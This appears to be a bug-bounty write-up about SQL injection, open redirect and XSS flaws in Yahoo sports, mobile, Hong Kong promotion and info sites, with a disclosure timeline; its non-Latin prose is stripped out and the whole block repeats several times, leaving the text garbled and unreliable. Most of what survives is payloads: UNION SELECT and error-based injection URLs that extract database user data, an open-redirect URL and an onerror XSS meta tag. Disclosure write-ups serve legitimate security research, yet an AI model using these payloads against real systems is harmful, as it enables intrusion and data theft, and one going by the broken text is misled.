sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .